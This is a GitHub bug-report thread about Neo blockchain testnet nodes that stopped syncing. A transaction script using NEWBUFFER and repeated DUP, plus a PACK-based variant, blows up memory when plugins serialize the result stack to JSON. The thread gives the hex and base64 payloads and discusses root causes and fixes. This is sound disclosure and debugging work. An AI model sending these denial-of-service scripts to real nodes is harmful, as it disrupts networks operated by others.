neo
All RPC nodes on testnet stopped syncing, possibly caused by some modules
Describe the bug
Accidentally, we constructed a tx that leaves lots of large StackItems on the Result Stack. After sending it, all seed nodes stopped syncing.
To Reproduce
- Send a transaction like this: 0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a
Expected behavior
All nodes keep syncing normally.
Additional context
We suspect that this is caused by one of the neo modules.
```
curl http://seed5t4.neo.org:20332 -d '{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "getblockcount",
  "params": [
    "0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a"
  ]
}'
{"jsonrpc":"2.0","id":1,"result":1245636}
```
They are all now stuck at block 1245636.
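As a minimal sketch of detecting a stuck node like this (assuming nothing beyond standard JSON-RPC 2.0; the helper names are hypothetical, not part of any Neo tooling), one can build the `getblockcount` request and compare successive samples:

```python
import json

def getblockcount_payload(request_id=1):
    # JSON-RPC 2.0 request body for getblockcount (the method takes no parameters)
    return json.dumps({"jsonrpc": "2.0", "id": request_id,
                       "method": "getblockcount", "params": []})

def is_stuck(samples):
    # Consider a node stuck when the reported block count never
    # advances across successive polls.
    return len(samples) >= 2 and max(samples) == min(samples)
```

Polling each seed node a few seconds apart and feeding the results to `is_stuck` reproduces the observation above: every sample comes back as 1245636.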
It seems to be caused by a bug in a plugin such as ApplicationLogs.
It must be a bug in ApplicationLogs, since neo-cli runs fine after I delete the ApplicationLogs plugin.
The script is:

```
0200001000884a4a ... 4a4a ;; (2047 * '4a')
```

The resulting ResultStack is 2 GB.
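For reference, that script can be decoded by hand: in the Neo 3 VM opcode table, 0x02 is PUSHINT32 (with a 4-byte little-endian operand), 0x88 is NEWBUFFER, and 0x4a is DUP, which is where the 2 GB figure comes from. A quick sketch of the arithmetic:

```python
import struct

# The script from the report: PUSHINT32 0x00100000, NEWBUFFER, then 2047 DUPs.
# Opcode values (Neo 3 VM): 0x02 = PUSHINT32, 0x88 = NEWBUFFER, 0x4a = DUP.
script = bytes.fromhex("0200001000" + "88" + "4a" * 2047)

buffer_size = struct.unpack("<i", script[1:5])[0]  # little-endian operand: 1 MiB
dup_count = len(script) - 6                        # everything after NEWBUFFER
items_on_stack = 1 + dup_count                     # original buffer plus one per DUP
total_bytes = items_on_stack * buffer_size         # 2048 * 1 MiB = 2 GiB
```

Each DUP only pushes another reference to the same 1 MiB buffer, so VM memory stays small; the 2 GB materializes only when each of the 2048 items is serialized independently.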
Based on @dusmart's exploit, one can construct a new exploit that requires 1024 GB of memory:

newbuffer, dup, dup, ..., pack (from here, every stackitem is 1 GB), dup, dup, dup, dup, dup
```
AgAAEACISkpKSkpKSkpK...
```
This script consumes an incredible amount of memory; it OOMs on my 64 GB machine.
I think the root cause is that we only considered CPU usage, ignoring memory cost, when setting OpCode prices. OpCodes like NEWBUFFER and DUP have fixed prices no matter how much memory they use. Hence a script that uses 2 GB of memory costs only 0.00013101 GAS.
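As a back-of-envelope check, using the standard 1 GAS = 10^8 datoshi conversion, this fee prices memory at more than ten terabytes of result-stack data per GAS:

```python
GAS_FACTOR = 10**8                        # 1 GAS = 1e8 datoshi
fee_gas = 13101 / GAS_FACTOR              # 0.00013101 GAS, per the report
result_stack_bytes = 2048 * 1024 * 1024   # the 2 GiB result stack

# Bytes of result-stack memory bought per whole GAS at this pricing
bytes_per_gas = result_stack_bytes / fee_gas
```

At roughly 1.6e13 bytes per GAS, memory is effectively free under the current pricing, which is exactly the asymmetry the comment describes.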
> construct a new exploit that requires 1024 GB of memory:
> newbuffer, dup, dup, ..., pack (from here, every stackitem is 1 GB), dup, dup, dup, dup, dup
There is a StackItem size limit: https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngineLimits.cs#L39. You can't create a 1 GB item; the maximum is about 1 MB.
@ZhangTao1596 Nope, I checked the code; there is no size check under the PACK OpCode. Just create 1024 1 MB buffers, then pack them together.
Similar OpCodes that can bypass the size limitation: PACKMAP, PACKSTRUCT, CAT.
@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643. I'm not sure if packed items are still counted in the ReferenceCounter.
@ZhangTao1596 The MaxStackSize here is the number of items; it won't stop you from having 2048 items of 1 GB each.
BTW, to answer your question, packed items are removed from the ReferenceCounter: `referenceCounter.RemoveStackReference(item);`
```csharp
/// <summary>
/// The maximum number of items that can be contained in the VM's evaluation stacks and slots.
/// </summary>
public uint MaxStackSize { get; init; } = 2 * 1024;
```
> Based on @dusmart's exploit, construct a new exploit that requires 1024 GB of memory:
> newbuffer, dup, dup, ..., pack (from here, every stackitem is 1 GB), dup, dup, dup, dup, dup
> AgAAEACISkpKSkpKSkpK...
> This script consumes an incredible amount of memory; it OOMs on my 64 GB machine.
Solution:
- set a size limit on StackItem, or give every stack a maximum size
- check item size before pushing it onto the stack
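A hypothetical sketch of the second bullet (all names here are illustrative, not the actual neo-vm API): track the cumulative byte size of a stack and check an item's size before accepting the push:

```python
class StackSizeExceeded(Exception):
    pass

class BoundedStack:
    """Illustrative sketch: a stack with a total byte budget."""

    def __init__(self, max_bytes):
        self.items = []
        self.total = 0
        self.max_bytes = max_bytes

    def push(self, item: bytes):
        # Check the item's size *before* pushing, as the proposal suggests.
        if self.total + len(item) > self.max_bytes:
            raise StackSizeExceeded("stack byte budget exceeded")
        self.items.append(item)
        self.total += len(item)
```

Unlike MaxStackSize, which only counts items, this bounds the bytes the stack can hold regardless of how the items were produced (NEWBUFFER, DUP, PACK, or CAT).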
By debugging on Windows, I found no significantly high memory usage during the whole VM execution. But a memory leak appears at https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/RpcServer/RpcServer.SmartContract.cs#L78

```csharp
json["stack"] = new JArray(engine.ResultStack.Select(p => ToJson(p, settings.MaxIteratorResultItems)));
```

if the script is called through RPC. Then we can suspect that https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/ApplicationLogs/LogReader.cs#L156

```csharp
var txJson = TxLogToJson(appExec);
```

in the ApplicationLogs plugin, and especially https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/ApplicationLogs/LogReader.cs#L74

```csharp
trigger["stack"] = appExec.Stack.Select(q => q.ToJson()).ToArray();
```

can lead to a memory leak.
With 36 DUP instructions constructing 37 1 MB buffers, the JString objects take more than 100 MB of memory. And there could be even more memory cost when the JObjects are turned into strings.
We have to limit the items in the ResultStack in ApplicationLogs.
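A rough estimate of that 100 MB figure, assuming each buffer is rendered as a base64 string and that the in-memory JString is UTF-16 at about 2 bytes per character (both are assumptions about the C# side, not measured from the code):

```python
import base64

BUFFER_BYTES = 1024 * 1024
COPIES = 37                     # 36 DUPs plus the original buffer

# base64 inflates 1 MiB of payload to ~1.4 million characters
b64_chars = len(base64.b64encode(b"\x00" * BUFFER_BYTES))

# .NET strings are UTF-16, so roughly 2 bytes per character in memory
jstring_bytes = b64_chars * 2 * COPIES
```

The estimate lands just over 100 MB, consistent with the observation above; the items are duplicated at serialization time even though the VM holds only one underlying buffer.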
> sending a tx like this 0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a
NeoGo has no problem with this:
```json
{
  "id": 5,
  "result": {
    "executions": [
      {
        "vmstate": "HALT",
        "trigger": "Application",
        "gasconsumed": "13053",
        "stack": [
          "error: unserializable: nil",
          "error: unserializable: nil",
          "error: unserializable: nil",
          "error: unserializable: nil",
          "error: unserializable: nil",
          "error: unserializable: nil",
          "error: unserializable: nil",
```
So our nodes never stopped and worked just fine.
> newbuffer, dup, dup, ..., pack (from here, every stackitem is 1 GB), dup, dup, dup, dup, dup

But this script breaks the node, so it should be investigated.
And it's all purely a JSONization issue: the script itself runs fine and does not consume a lot of memory, as @Hecate2 already noticed, but an attempt to make JSON out of the result does. I think we'll just limit the JSON size. We have two ways to JSONize stack items: one is used for StdLib's jsonSerialize, and another for user-facing things (like RPC), with the latter carrying type information. ToJSON is size-limited (as is conversion to binary representation, so I think the node would handle this script in a transaction fine), but ToJSONWithTypes is not, and that's what we're going to fix (optimizing it along the way, because ToJSON is much faster in some cases).
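A minimal sketch of what a size-limited JSONization could look like (illustrative only; the names and the serialize-then-check approach are assumptions, and a real implementation would count bytes incrementally while writing):

```python
import json

class JsonSizeExceeded(Exception):
    pass

def to_json_limited(item, max_size):
    # Serialize, then refuse to return anything over the cap. This turns
    # the 2 GB blow-up into a bounded error instead of an OOM.
    s = json.dumps(item)
    if len(s) > max_size:
        raise JsonSizeExceeded(f"{len(s)} bytes exceeds the {max_size} cap")
    return s
```

With such a cap in place, a malicious result stack produces an error string in the log (much like NeoGo's "error: unserializable" entries above) rather than exhausting node memory.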
@roman-khimov Could you please test this case?
I don't think it differs a lot from the previous one; it'll all be fixed by nspcc-dev/neo-go#2386.
I think this one was solved quite a while ago and can be closed now.